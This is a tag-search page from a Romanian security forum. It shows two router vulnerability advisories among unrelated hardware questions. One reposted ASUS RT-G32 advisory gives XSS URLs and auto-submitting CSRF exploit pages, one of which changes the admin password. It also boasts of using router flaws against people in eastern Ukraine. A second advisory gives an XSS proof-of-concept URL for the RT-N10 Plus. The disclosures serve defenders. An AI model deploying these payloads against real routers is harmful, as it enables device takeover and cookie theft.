Jump to content

Search the Community

Showing results for tags 'asus'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 4 results

  1. Custom rom sau stock? Firmware schimbat? Overclock? Ce launchere/gadgets folositi? Un screenshot la ecran? Sau dati voi alte detalii intr-un reply. Incep eu. HTC ONE M8, custom rom de pe xda, fara oc, fara laucher de pe playstore (Love HTC UI), niciun gadget, ss n-are rost ca n-am nimic special facut pe ecran si cam atat.
  2. Hello list! There are Cross-Site Scripting and Cross-Site Request Forgery vulnerabilities in ASUS Wireless Router RT-G32. ------------------------- Affected products: ------------------------- Vulnerable is the next model: ASUS RT-G32 with different versions of firmware. I checked in ASUS RT-G32 with firmware versions 2.0.2.6 and 2.0.3.2. ---------- Details: ---------- Cross-Site Scripting (WASC-08): http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27 http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27 http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27 http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27 These vulnerabilities work as via GET, as via POST (work even without authorization). ASUS RT-G32 XSS-1.html <html> <head> <title>ASUS RT-G32 XSS exploit (C) 2015 MustLive</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/start_apply.htm" method="post"> <input type="hidden" name="next_page" value="'+alert(document.cookie)+'"> <input type="hidden" name="group_id" value="'+alert(document.cookie)+'"> <input type="hidden" name="action_script" value="'+alert(document.cookie)+'"> <input type="hidden" name="flag" value="'+alert(document.cookie)+'"> </form> </body> </html> Cross-Site Request Forgery (WASC-09): CSRF vulnerability allows to change different settings, including admin's password. As I showed in this exploit (post-auth). ASUS RT-G32 CSRF-1.html <html> <head> <title>ASUS RT-G32 CSRF exploit (C) 2015 MustLive</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/start_apply.htm" method="post"> <input type="hidden" name="http_passwd" value="admin"> <input type="hidden" name="http_passwd2" value="admin"> <input type="hidden" name="v_password2" value="admin"> <input type="hidden" name="action_mode" value="+Apply+"> </form> </body> </html> I found this and other routers since summer to take control over terrorists in Crimea, Donetsk & Lugansks regions of Ukraine. Read about it in the list (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-February/009077.html) and in many my interviews (http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html). I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7644/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua Source
  3. ##################################### Title:- Reflected XSS vulnarbility in Asus RT-N10 Plus router Author: Kaustubh G. Padwad Product: ASUS Router RT-N10 Plus Firmware: 2.1.1.1.70 Severity: Medium Auth: Requierd # Description: Vulnerable Parameter: flag= # Vulnerability Class: Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) # About Vulnerability: Asus Router RT-N10 Plus with firmware 2.1.1.70 is vulnarable for crosss site scripting attack,this may cause a huge network compemise. #Technical Details: The value of the flag request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload initial78846%27%3balert("Hacked_BY_S3curity_B3ast")%2f%2f372137b5d was submitted in the flag parameter. This input was echoed unmodified in the application's response. #Steps to Reproduce: (POC): After setting up router Enter this URL 1.http://ip-of-router/result_of_get_changed_status.asp?current_page=&sid_list=LANGUAGE%3B&action_mode=+App ly+&preferred_lang=&flag=initial78846%27%3balert(1337)%2f%2f372137b5d 2. this will ask for creadintial once creatintial enterd it will be successfull XSS # Disclosure: 8-jan-2015 Repoerted to ASUS 9-jan-2015 Asus confirm that they reported to concern department 15-jan-2015 Ask for update from asus asus says reported to HQ 28-jan-2015 Ask asus about reporting security foucus No reply from ASUS 29-jan-2015 security focus bugtraq #credits: Kaustubh Padwad Information Security Researcher kingkaustubh@me.com https://twitter.com/s3curityb3ast http://breakthesec.com https://www.linkedin.com/in/kaustubhpadwad Source
  4. Salutare, Cand vreau sa bootez un dvd cu Win7 imi apare urmatorul mesaj "reboot and select proper boot device or insert boot media in selected boot device and press a key" Mentionez ca am un Asus N73JF, iar in meniul de bootare setarile facute in felul urmator: 1 - HDD 2 - DVD 3 Win Boot Manager La SATA settings este selectat IDE ci nu AHCI In plus nu mai pot intra nici in sistem deoarece nu se incarca. Astept un raspuns!
×
×
  • Create New...